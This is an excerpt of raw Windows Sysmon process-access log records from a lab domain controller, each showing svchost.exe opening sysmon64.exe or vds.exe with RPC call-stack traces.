13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.455{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.455{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.446{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.446{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.446{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.445{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.443{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.443{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.442{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.423{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 